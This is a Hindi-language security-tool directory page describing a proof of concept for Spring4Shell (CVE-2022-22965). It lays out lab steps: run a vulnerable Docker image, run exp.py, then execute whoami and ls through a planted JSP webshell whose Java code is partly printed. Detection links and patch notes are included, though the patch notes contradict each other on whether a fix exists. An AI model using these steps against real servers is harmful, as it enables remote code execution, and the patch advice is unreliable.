Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
उपकरण/GitHubGitHub/thegejr/springshell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

रिपॉजिटरी देखें
1318214 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring Core RCE - CVE-2022-22965

Spring Cloud के बाद, 29 मार्च को Spring की एक और गंभीर भेद्यता इंटरनेट पर सामने आई: Spring Core RCE

31 मार्च को Spring ने नए संस्करण जारी किए जो इस भेद्यता को ठीक करते हैं। पैचिंग अनुभाग देखें।

31 मार्च को आखिरकार इस भेद्यता के लिए एक CVE-नंबर आवंटित किया गया, जिसका CVSS स्कोर 9.8 (क्रिटिकल) है।

प्रूफ-ऑफ-कॉन्सेप्ट

एक्सप्लॉइट का उपयोग करना बहुत आसान है, इसलिए CVSS स्कोर 9.8 इतना उच्च है।

भेद्यता का परीक्षण करने के लिए आप निम्नलिखित कर सकते हैं।

Spring की एक भेद्य Docker इमेज प्रारंभ करें।

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

यह भेद्य Spring को localhost:8082 पते से बाँधता है।

curl के साथ सत्यापित करें कि इमेज सही ढंग से प्रारंभ हुई है।

root@kitploit:~
curl http://localhost:8082

ok की प्रतिक्रिया लौटाई जानी चाहिए।

आइए अब भेद्य इमेज का शोषण करें!

root@kitploit:~
python3 exp.py --url http://localhost:8082
टूल डाउनलोड करें

The vulnerability exists .... की प्रतिक्रिया लौटाई जानी चाहिए।

अब आप curl के साथ भेद्यता का शोषण कर सकते हैं।

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

प्रचलित कोडिंग PoC

एक्सप्लॉइट को अब तक exp.py के रूप में अपलोड किया जा चुका है
प्रचलित कोडिंग PoC
अजीब स्थिति

पैचिंग

Spring ने अब नए संस्करण जारी कर दिए हैं जो इस CVE का समाधान करते हैं। Spring की घोषणा देखें।

भेद्यता को पैच करने वाला कमिट

भेद्यता का प्रभाव

  1. JDK संस्करण 9 और उससे ऊपर
  2. Spring Framework या व्युत्पन्न फ्रेमवर्क का उपयोग किया जाता है

बग फिक्स सुझाव

वर्तमान में, Spring ने आधिकारिक रूप से पैच जारी नहीं किया है, अस्थायी समाधान के रूप में JDK संस्करण को कम करने की अनुशंसा की जाती है

ब्लू टीम

Yara

  • Florian Roth - Spring4Shell वेबशेल

Sigma

  • Emanuele De Lucia - .jsp वेबशेल का निर्माण

SPLUNK

  • Alex John - Splunk डिटेक्शन SPL